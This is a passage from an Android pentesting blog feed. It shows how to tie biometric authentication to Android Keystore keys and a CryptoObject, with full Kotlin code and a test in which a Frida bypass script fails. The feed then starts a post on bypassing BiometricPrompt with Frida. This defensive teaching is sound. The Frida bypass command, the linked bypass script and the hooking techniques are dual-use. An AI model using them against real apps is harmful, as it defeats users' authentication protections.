
When generating a key in the Keystore, you can specify various security properties, such as requiring user authentication to use the key. This is done through methods like `setUserAuthenticationRequired(true)` and `setInvalidatedByBiometricEnrollment(true)`. These settings tie the key&apos;s usage to biometric authentication, ensuring that only the authenticated user can perform cryptographic operations like encryption and decryption.

By configuring the Keystore properly, you can ensure that:

-   Keys are protected from unauthorized access.
-   Keys are invalidated if the biometric enrollment changes, adding another layer of security.
-   Keys can only be used after successful biometric authentication, making them inaccessible without the user&apos;s consent.

#### The Role of the CryptoObject

The **CryptoObject** is a wrapper around cryptographic operations, such as encryption and decryption, and is tightly linked to the biometric authentication process. It works as the bridge between the Android biometric prompt and the cipher created using the Keystore key.

Here’s how the `CryptoObject` fits into the authentication flow:

1.  **Tied to the Cipher**: When you create a `CryptoObject`, it’s usually tied to a `Cipher` object that handles encryption and decryption. This means that cryptographic operations are locked behind biometric authentication.
2.  **Used in Biometric Authentication**: When the user triggers biometric authentication (such as fingerprint scanning), the system verifies the user and, upon successful authentication, returns the `CryptoObject`. At this point, the cipher is “unlocked” and ready to perform the required cryptographic operation.
3.  **Ensures Secure Data Handling**: By linking the `CryptoObject` to biometric authentication, sensitive data like session keys or tokens can be encrypted and decrypted only when the user successfully authenticates. Without this step, even if an attacker gains access to encrypted data, they cannot decrypt it without biometric authentication.

For example, in the case of encrypting and decrypting sensitive data, the `CryptoObject` ensures that the cipher used to handle the encryption or decryption cannot be accessed without the user&apos;s biometric credentials.

# Steps to Create Secure Local Authentication

Building on our understanding of the Keystore and CryptoObject, we can now focus on defending against the attack. To create secure local authentication in Android, several key elements must be implemented. Here&apos;s what you need to consider:

1.  **Generate the Keystore Key**: Use the Android Keystore API to create a cryptographic key with the following settings:
    -   `setUserAuthenticationRequired(true)`: Ensures that the key can only be used after biometric authentication.
    -   `setInvalidatedByBiometricEnrollment(true)`: Invalidates the key if the user enrolls a new biometric credential (such as a fingerprint).
    -   `setUserAuthenticationValidityDurationSeconds(-1)`: This forces the user to authenticate every time the key is used.
2.  **Initialize the Cipher Object**: Once the key is generated, initialize a `Cipher` object using the key from the Keystore. This cipher will handle the encryption and decryption operations.
3.  **Create the CryptoObject**: Use the `Cipher` object to create a `BiometricPrompt.CryptoObject`. This object ties the biometric authentication to cryptographic operations.
4.  **Handle Authentication Success**: Implement the `BiometricPrompt.AuthenticationCallback.onAuthenticationSucceeded()` method. In this callback, retrieve the `Cipher` object from the `CryptoObject` and **use it to decrypt critical data**, such as a session key or another symmetric key that will be used to access your application’s encrypted data.
5.  **Trigger Authentication**: Call the `BiometricPrompt.authenticate()` function, passing in the `CryptoObject` and the callback defined in the previous steps. This ensures that biometric authentication is required before any decryption occurs.

In a previous post, we used some of these functionalities to create local authentication for a simple application. The main improvement in this approach is the use of the Android Keystore and `CryptoObject` to securely tie biometric authentication to cryptographic processes, enhancing overall security.

# Understanding the Code: Biometric Authentication with Encryption in Android

Now that we have a solid understanding of the different components and a plan in place, it’s time to put everything into code. In the next section, we’ll see how the Android Keystore and CryptoObject work together with AES encryption to secure sensitive data, ensuring that only an authenticated user can access it.

We’ll walk through each part of the code, explaining what each function does and how it contributes to the overall security of the application. The concepts we just explored, secure key storage in the Keystore and cryptographic operations with the `CryptoObject`, are implemented here to provide a robust local authentication mechanism.

#### `onCreate()` – The Entry Point

The `onCreate()` method is where the app starts when the user opens this activity. Here, we set up the layout and define what happens when the buttons are clicked. There are three main actions the user can trigger: encrypt data, authenticate with biometrics, or reset encrypted data.

```kotlin
override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    setContentView(R.layout.activity_main)

    createKey()

    val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
    btnEncrypt.setOnClickListener {
        showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
    }

    val btnReset: Button = findViewById(R.id.btn_reset)
    btnReset.setOnClickListener {
        resetEncryptedData()
    }

    val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
    btnAuthenticate.setOnClickListener {
        showBiometricPrompt()
    }
}


```

-   **`createKey()`**: This function is called right away to generate a cryptographic key in the Android Keystore, which is required for encryption and decryption.
-   **Button Click Listeners**: Each button is linked to a function that handles encrypting, authenticating, or resetting data. Clicking the Encrypt button triggers biometric authentication before encrypting the data, while the Authenticate button prompts the user to authenticate in order to decrypt the stored data.

#### `createKey()` – Generating a Secure Key

This function creates a secure key in the **Android Keystore**. The key is used for both encryption and decryption, and it’s configured with specific security settings, such as requiring biometric authentication every time it’s used.

```kotlin
private fun createKey() {
    val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
    val keyGenParameterSpec = KeyGenParameterSpec.Builder(
        keyAlias,
        KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
    ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
        .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
        .setUserAuthenticationRequired(true)
        .setInvalidatedByBiometricEnrollment(true)
        .setUserAuthenticationValidityDurationSeconds(-1)
        .build()

    keyGenerator.init(keyGenParameterSpec)
    keyGenerator.generateKey()
}

```

-   **`KeyProperties.KEY_ALGORITHM_AES`**: Specifies that the AES encryption algorithm will be used.
-   **`KeyGenParameterSpec`**: This defines the key&apos;s properties, like requiring biometric authentication and using the GCM block mode (which allows encryption without padding).
-   **`setUserAuthenticationRequired(true)`**: Ensures that the key can only be used if the user has authenticated via biometrics.

#### `initCipher()` – Preparing for Encryption or Decryption

The `initCipher()` function sets up the cryptographic cipher. A **`Cipher`** object performs the actual encryption or decryption, in this case AES in GCM mode. This function initializes the cipher for either encryption or decryption, depending on the mode passed in.

```kotlin
private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
    return try {
        keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
        keyStore.load(null)

        val key = keyStore.getKey(keyAlias, null) as SecretKey
        cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

        if (mode == Cipher.ENCRYPT_MODE) {
            cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
        } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
            val gcmSpec = GCMParameterSpec(128, iv)
            cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV for decryption
        }
        true
    } catch (e: Exception) {
        e.printStackTrace()
        false
    }
}

```

-   **Encryption Mode**: If the mode is `ENCRYPT_MODE`, the cipher is initialized to encrypt data, and a new IV (initialization vector) is generated.
-   **Decryption Mode**: If the mode is `DECRYPT_MODE`, the cipher is initialized with the existing IV (retrieved from storage) to decrypt data. The IV is critical for successful decryption.
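
The IV contract here can be verified outside Android with plain JDK crypto. The sketch below is written in plain Java rather than Android Kotlin so it runs on any JVM (the class name `GcmIvDemo` is ours, and the key is generated locally instead of living in the Keystore); it encrypts with a freshly generated IV and shows that decryption succeeds only when that exact IV is fed back via `GCMParameterSpec`:

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.nio.charset.StandardCharsets;

public class GcmIvDemo {
    // Encrypts then decrypts, reusing the IV the encrypting cipher generated
    public static String roundTrip(String plaintext) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(256);
        SecretKey key = kg.generateKey();  // on Android this key would live in the Keystore

        Cipher enc = Cipher.getInstance("AES/GCM/NoPadding");
        enc.init(Cipher.ENCRYPT_MODE, key);
        byte[] iv = enc.getIV();  // fresh IV; must be stored next to the ciphertext
        byte[] ciphertext = enc.doFinal(plaintext.getBytes(StandardCharsets.UTF_8));

        Cipher dec = Cipher.getInstance("AES/GCM/NoPadding");
        dec.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv));  // same IV, 128-bit tag
        return new String(dec.doFinal(ciphertext), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        System.out.println(roundTrip("PASSWORD"));  // prints PASSWORD
    }
}
```

Losing or corrupting the stored IV makes the ciphertext permanently undecryptable, which is why the app persists it alongside the encrypted data.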

#### `showBiometricPromptForEncryption()` – Encrypting After Biometric Authentication

This function prompts the user to authenticate with biometrics before encrypting the data. After a successful authentication, the cipher is used to encrypt the provided plaintext data.

```kotlin
private fun showBiometricPromptForEncryption(plainText: String) {
    val executor = ContextCompat.getMainExecutor(this)
    val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
        override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
            val cryptoObject = result.cryptoObject
            if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                try {
                    val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                    if (encryptedData != null) {
                        val iv = cryptoObject.cipher?.iv
                        storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                        Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } catch (e: Exception) {
                    e.printStackTrace()
                    Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
        }
    })

    if (initCipher(Cipher.ENCRYPT_MODE)) {
        val cryptoObject = BiometricPrompt.CryptoObject(cipher)
        val promptInfo = BiometricPrompt.PromptInfo.Builder()
            .setTitle(&quot;Biometric Authentication for Encryption&quot;)
            .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
            .setNegativeButtonText(&quot;Use password&quot;)
            .build()

        biometricPrompt.authenticate(promptInfo, cryptoObject)
    }
}

```

-   **Biometric Prompt**: The app displays a biometric authentication prompt. When the user successfully authenticates, the cipher is used to encrypt the plaintext (`&quot;PASSWORD&quot;`).
-   **Cipher Execution**: The `cipher.doFinal()` method encrypts the data and generates an encrypted byte array. This is then stored along with the IV (required for decryption).
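
The storage step mirrors `storeEncryptedDataAndIV()` and `retrieveStoredIV()` from the app. A minimal off-device sketch, with plain static fields standing in for `SharedPreferences` (an assumption of this sketch), shows that Base64 round-trips the IV byte-for-byte:

```java
import java.util.Arrays;
import java.util.Base64;

public class StorageDemo {
    // Plain static fields stand in for SharedPreferences in this off-device sketch
    static String storedCiphertext;
    static String storedIv;

    static void storeEncryptedDataAndIV(byte[] ciphertext, byte[] iv) {
        storedCiphertext = Base64.getEncoder().encodeToString(ciphertext);
        storedIv = Base64.getEncoder().encodeToString(iv);
    }

    static byte[] retrieveStoredIV() {
        return Base64.getDecoder().decode(storedIv);
    }

    public static void main(String[] args) {
        byte[] iv = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12};  // 12-byte GCM IV
        storeEncryptedDataAndIV(new byte[] {42}, iv);
        System.out.println(Arrays.equals(retrieveStoredIV(), iv));  // true
    }
}
```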

#### `showBiometricPrompt()` – Decrypting After Biometric Authentication

This function works similarly to the encryption process but focuses on decryption. After the user authenticates, the cipher decrypts the stored data.

```kotlin
private fun showBiometricPrompt() {
    val executor = ContextCompat.getMainExecutor(this)
    val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
        override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
            val cryptoObject = result.cryptoObject
            if (cryptoObject != null) {
                val decryptedData = decryptData(cryptoObject)
                if (decryptedData != null &amp;&amp; isValidData(decryptedData)) {
                    showSuccess()
                } else {
                    Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
        }
    })

    if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
        val cryptoObject = BiometricPrompt.CryptoObject(cipher)
        val promptInfo = BiometricPrompt.PromptInfo.Builder()
            .setTitle(&quot;Biometric Authentication&quot;)
            .setSubtitle(&quot;Log in using your fingerprint&quot;)
            .setNegativeButtonText(&quot;Use password&quot;)
            .build()

        biometricPrompt.authenticate(promptInfo, cryptoObject)
    }
}


```

-   **Decrypting Data**: The cipher decrypts the previously encrypted data using the stored IV. The `isValidData()` function checks if the decrypted data matches the expected value (`&quot;PASSWORD&quot;`).
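
The comparison inside `isValidData()` deserves care: a plain `contentEquals` is fine for a demo, but a constant-time comparison avoids leaking, through timing, how many leading bytes matched. A hedged plain-Java sketch (class and method names are ours) using the JDK’s `MessageDigest.isEqual`, which is documented as time-constant:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class ValidateDemo {
    static final byte[] EXPECTED = "PASSWORD".getBytes(StandardCharsets.UTF_8);

    // Constant-time check: runtime does not depend on how many bytes match
    public static boolean isValidData(byte[] decryptedData) {
        if (decryptedData == null) return false;
        return MessageDigest.isEqual(decryptedData, EXPECTED);
    }

    public static void main(String[] args) {
        System.out.println(isValidData("PASSWORD".getBytes(StandardCharsets.UTF_8)));  // true
        System.out.println(isValidData("password".getBytes(StandardCharsets.UTF_8)));  // false
    }
}
```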

#### `resetEncryptedData()` – Clearing Stored Data

This function allows users to clear the encrypted data and IV from `SharedPreferences`. This is useful for resetting the app or logging out.

```kotlin
private fun resetEncryptedData() {
    val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
    val editor = sharedPreferences.edit()
    editor.remove(&quot;encrypted_data&quot;)
    editor.remove(&quot;iv&quot;)
    editor.apply()
    Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
}

```

&lt;details&gt;
&lt;summary&gt;All code&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

   private lateinit var cipher: Cipher
   private lateinit var keyStore: KeyStore
   private val keyAlias = &quot;test&quot;
   val expectedData = &quot;PASSWORD&quot;.toByteArray()

   override fun onCreate(savedInstanceState: Bundle?) {
       super.onCreate(savedInstanceState)
       setContentView(R.layout.activity_main)

       createKey()

       val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
       btnEncrypt.setOnClickListener {
           showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
       }

       val btnReset: Button = findViewById(R.id.btn_reset)
       btnReset.setOnClickListener {
           resetEncryptedData()
       }

       val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
       btnAuthenticate.setOnClickListener {
           showBiometricPrompt()
       }
   }

   // Create Key in Keystore
   private fun createKey() {
       val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
       val keyGenParameterSpec = KeyGenParameterSpec.Builder(
           keyAlias,
           KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
       ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
           .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
           .setUserAuthenticationRequired(true)
           .setInvalidatedByBiometricEnrollment(true)
           .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
           .build()

       keyGenerator.init(keyGenParameterSpec)
       keyGenerator.generateKey()
   }

   // Initialize the cipher for encryption/decryption
   private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
       return try {
           keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
           keyStore.load(null)

           val key = keyStore.getKey(keyAlias, null) as SecretKey
           cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

           if (mode == Cipher.ENCRYPT_MODE) {
               cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
           } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
               val gcmSpec = GCMParameterSpec(128, iv)
               cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
           }
           true
       } catch (e: Exception) {
           e.printStackTrace()
           false
       }
   }

   // Show biometric prompt and tie it to the cipher object
   private fun showBiometricPrompt() {
       val executor = ContextCompat.getMainExecutor(this)
       val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
           override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
               super.onAuthenticationSucceeded(result)
               val cryptoObject = result.cryptoObject
               if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                   try {
                       val decryptedData = decryptData(cryptoObject)
                       if (decryptedData == null || !isValidData(decryptedData)) {
                           Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                       } else {
                           showSuccess()
                       }
                   } catch (e: Exception) {
                       e.printStackTrace()
                       Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                   }
               } else {
                   Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
               }
           }
           override fun onAuthenticationFailed() {
               super.onAuthenticationFailed()
               Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
           }
       })

       if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
           val cryptoObject = BiometricPrompt.CryptoObject(cipher)
           val promptInfo = BiometricPrompt.PromptInfo.Builder()
               .setTitle(&quot;Biometric Authentication&quot;)
               .setSubtitle(&quot;Log in using your fingerprint&quot;)
               .setNegativeButtonText(&quot;Use password&quot;)
               .build()

           biometricPrompt.authenticate(promptInfo, cryptoObject)
       }
   }

   // Updated: Fixing how cipher is used after biometric authentication completes
   private fun showBiometricPromptForEncryption(plainText: String) {
       val executor = ContextCompat.getMainExecutor(this)
       val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
           override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
               super.onAuthenticationSucceeded(result)
               val cryptoObject = result.cryptoObject
               if (cryptoObject != null) {
                   try {
                       // Encrypt after biometric authentication
                       val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                       if (encryptedData != null) {
                           val iv = cryptoObject.cipher?.iv  // Get the generated IV
                           storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                           Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                       }
                   } catch (e: Exception) {
                       e.printStackTrace()
                       Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                   }
               }
           }

           override fun onAuthenticationFailed() {
               super.onAuthenticationFailed()
               Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
           }
       })

       if (initCipher(Cipher.ENCRYPT_MODE)) {
           val cryptoObject = BiometricPrompt.CryptoObject(cipher)
           val promptInfo = BiometricPrompt.PromptInfo.Builder()
               .setTitle(&quot;Biometric Authentication for Encryption&quot;)
               .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
               .setNegativeButtonText(&quot;Use password&quot;)
               .build()

           biometricPrompt.authenticate(promptInfo, cryptoObject)
       }
   }

   // Check if decrypted data is valid
   private fun isValidData(decryptedData: ByteArray): Boolean {
       return decryptedData.contentEquals(expectedData)  // Example validation
   }

   // Decrypt data using the CryptoObject
   private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
       return try {
           val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
           val iv = retrieveStoredIV()  // Retrieve the stored IV
           if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
               val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
               decryptedData
           } else {
               null
           }
       } catch (e: Exception) {
           e.printStackTrace()
           null
       }
   }

   private fun encryptAndStoreData(plainText: String) {
       if (initCipher(Cipher.ENCRYPT_MODE)) {
           try {
               val encryptedData = cipher.doFinal(plainText.toByteArray())
               val iv = cipher.iv  // Get the generated IV
               storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
           } catch (e: Exception) {
               e.printStackTrace()
               Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
           }
       }
   }

   // Simulate storing encrypted data and IV (replace with actual storage logic)
   private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       val editor = sharedPreferences.edit()
       editor.putString(&quot;encrypted_data&quot;, encryptedData)
       editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
       editor.apply()
   }

   // Retrieve encrypted data and IV
   private fun retrieveEncryptedData(): String {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
   }

   private fun retrieveStoredIV(): ByteArray {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
       return Base64.decode(ivString, Base64.DEFAULT)
   }

   private fun showSuccess() {
       Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
       val intent = Intent(this, SuccessActivity::class.java)
       startActivity(intent)
       finish()  // Optionally finish MainActivity to prevent going back without re-authentication
   }
   private fun resetEncryptedData() {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       val editor = sharedPreferences.edit()
       editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
       editor.remove(&quot;iv&quot;)  // Remove IV
       editor.apply()
       Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
       Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
   }
}

```
&lt;/details&gt;


# Testing the application

Once you have the code, you should be able to run it in Android Studio using an emulator without any issues. In a more &quot;realistic&quot; scenario, the application would typically include an input field where the user can enter a password, and the app would verify if it&apos;s correct. After that, the user would have the option to set up local authentication, so they wouldn’t need to enter the password every time they log in.

However, due to time constraints, I won’t be creating a full application with all these features. Instead, we’ll assume that the user has successfully set up local authentication using a simple &quot;store password&quot; button.

![](/content/images/2024/09/image-14.png)

First screen of the application

![](/content/images/2024/09/image-15.png)

Fingerprint authentication to encrypt the data

After this step, the biometric authentication button can be used to access the app.

![](/content/images/2024/09/image-16.png)

Second screen

Now, if we repeat the process using **Objection**, after a successful authentication we can interact with the command-line interface (CLI). The first thing we notice is that the Keystore has generated a symmetric key with the alias `test`. Thanks to how the Keystore operates, an attacker cannot retrieve the actual key material.

![](/content/images/2024/09/image-11.png)

Keystore data

On the other hand, if we navigate to the application’s shared preferences directory, we can see the encrypted data along with the initialization vector (IV). Even if an attacker accesses this data, the ciphertext and IV alone are not enough to recover the plaintext: the AES key never leaves the Keystore, so decryption still requires a successful biometric authentication on the device.

![](/content/images/2024/09/image-10.png)

Shared Preferences data

## Bypassing local authentication

In the previous chapter, we successfully bypassed the local authentication of the application using a Frida script. Now, we will attempt to do the same with the current version of the application.

The process remains the same as before. We start the application using Frida and load the script designed to bypass local authentication.

```bash
frida -U -f com.example.localauth -l global-bypass.js

```

![](/content/images/2024/09/image-12.png)

After launching the script and pressing the &quot;Biometric Authentication&quot; button, we encounter the following error:

![](/content/images/2024/09/image-13.png)

This error occurs because the script forces a successful authentication, but the resulting `CryptoObject` is null, so the decryption step fails and the attacker never reaches the second screen. This demonstrates that the application is now more resistant: this particular Frida script can no longer bypass the authentication flow.

# Conclusions

In this chapter, we explored effective methods for securing biometric authentication in Android, focusing on the **CryptoObject** and the **Android Keystore**. These technologies, when used correctly, provide robust security, but it is essential to recognize that no system is completely impervious to attack. Skilled attackers, particularly those using tools like **Frida**, can potentially bypass local authentication mechanisms by hooking into the application and manipulating the authentication flow in real-time.

Our approach introduces a strong first line of defense by linking biometric authentication to cryptographic operations managed through the **Android Keystore**. This ensures that sensitive operations, such as encryption and decryption, are only performed after a valid biometric authentication. By enforcing proper validation of the **CryptoObject** and cipher, we mitigate attacks that attempt to exploit vulnerabilities like bypassing authentication with null or manipulated cryptographic objects.

However, even with these protections, attackers with sufficient expertise in reverse engineering can still target the validation logic itself. They might attempt to modify or replace the checks that validate the **CryptoObject** and its associated cryptographic operations. This underscores the necessity of implementing additional layers of security.

To further enhance protection, implementing **Frida detection** techniques can help identify and block runtime tampering attempts. Although Frida detection is not a definitive solution, it raises the difficulty level for attackers, forcing them to invest more time and resources into bypassing both the biometric authentication and the tamper-detection mechanisms.

When applied to a **REST API** architecture, these security practices become even more effective. By ensuring that API access is contingent upon a valid biometrically-signed token and that server-side validation is in place, attackers are faced with an additional layer of security that is much harder to breach. Integrating these practices into the API flow increases the overall complexity of any attack, making it significantly more difficult for attackers to bypass protections, especially when secure token management and authentication processes are employed on both the client and server sides.
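A hedged sketch of what the client side of such a flow might look like, assuming an EC signing key under the illustrative alias `api_auth_key` was previously created in the Android Keystore with `setUserAuthenticationRequired(true)`:

```kotlin
import java.security.KeyStore
import java.security.PrivateKey
import java.security.Signature

// Hedged sketch: sign a server-issued nonce with a Keystore key that
// requires user authentication; the server verifies the signature with
// the enrolled public key. The alias &quot;api_auth_key&quot; is illustrative.
fun signNonce(nonce: ByteArray): ByteArray {
    val keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;).apply { load(null) }
    val privateKey = keyStore.getKey(&quot;api_auth_key&quot;, null) as PrivateKey
    return Signature.getInstance(&quot;SHA256withECDSA&quot;).run {
        initSign(privateKey)  // throws if the key was not unlocked by authentication
        update(nonce)
        sign()
    }
}
```

Because the private key never leaves the Keystore and signing is gated on authentication, a Frida hook that merely forces the success callback still cannot produce a valid signed token for the API.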

In conclusion, while no security measure is completely invulnerable, particularly when attackers have physical access to the device or employ advanced tools like Frida, layering multiple defense mechanisms significantly increases the effort required to exploit the system. By combining biometric authentication with cryptographic security, tamper detection, and secure REST API practices, we can create a far more resilient security architecture, making it much harder for attackers to succeed.

# Resources

-   Biometric Authentication with BiometricPrompt. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/sign-in/biometric-auth](https://developer.android.com/training/sign-in/biometric-auth)
-   Frida Script to bypass Local Authentication. Available at: [https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js)
-   Frida - Dynamic Instrumentation Toolkit. &quot;Frida.&quot; Available at: [https://frida.re](https://frida.re/)
-   Android Keystore System. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/articles/keystore](https://developer.android.com/training/articles/keystore)
-   How Secure is Your Android Keystore Authentication? &quot;WithSecure Labs.&quot; Available at: [https://labs.withsecure.com/publications/how-secure-is-your-android-keystore-authentication](https://labs.withsecure.com/publications/how-secure-is-your-android-keystore-authentication)
-   OWASP Mobile Application Security Testing Guide (MASTG) - Biometric Authentication Testing. &quot;OWASP.&quot; Available at: [https://mas.owasp.org/MASTG/chapters/0x06b-Testing-Authentication-and-Session-Management](https://mas.owasp.org/MASTG/chapters/0x06b-Testing-Authentication-and-Session-Management)</content:encoded><author>Ruben Santos</author></item><item><title>Cracking Android Biometric Authentication with Frida</title><link>https://www.kayssel.com/post/android-7</link><guid isPermaLink="true">https://www.kayssel.com/post/android-7</guid><description>In this chapter of the Android pentesting series, we implemented local authentication using the BiometricPrompt API and demonstrated how it can be bypassed using Frida on a rooted emulator. We highlighted the importance of securing authentication to prevent bypass attacks.</description><pubDate>Sun, 15 Sep 2024 07:43:00 GMT</pubDate><content:encoded># Introduction

In this chapter of my **Android pentesting series**, I’ll take a closer look at **local authentication**—a critical security feature in modern apps. We’ll develop a small application to give you a hands-on understanding of how local authentication works using the **BiometricPrompt API**. After building the authentication layer, I’ll demonstrate how attackers can bypass it using **Frida** on a rooted emulator.

This practical approach will help you not only understand how to implement authentication but also reveal where its vulnerabilities lie and how they can be exploited.

In this chapter, I’ll cover:

-   Setting up the Android Emulator for biometric testing.
-   Developing and testing a basic **BiometricPrompt** authentication app.
-   Bypassing authentication using **Frida**.
-   Identifying common weaknesses in basic authentication setups.

By the end, you’ll have a solid grasp of how local authentication works, its limitations, and how to protect against potential bypass attacks. In future chapters, we’ll dive deeper into securing the authentication flow and leveraging cryptographic operations to strengthen your app’s security.

# Using Android Studio Emulator for Biometric Testing

To accurately test biometric features such as fingerprint authentication, it&apos;s recommended to use the **Android Emulator** from **Android Studio** rather than third-party virtual machines. The Android Emulator provides built-in support for fingerprint sensors, making it ideal for testing biometric features. Here&apos;s a brief setup guide:

1.  **Install Android Studio**: First, download and install Android Studio, then open your project or create a new one.
2.  **Set Up the Emulator**: Go to **Tools &gt; AVD Manager**, create a virtual device running Android 9.0 or higher (required for biometric support), and start the emulator.
3.  **Install ADB (Android Debug Bridge)**: Ensure you have ADB installed on your host machine. ADB is crucial for interacting with the emulator from the command line and for debugging your app. You can install ADB by following [this guide](https://developer.android.com/studio/command-line/adb).

For detailed steps on each process, refer to the following tutorials:

-   [Install Android Studio](https://developer.android.com/studio/install)
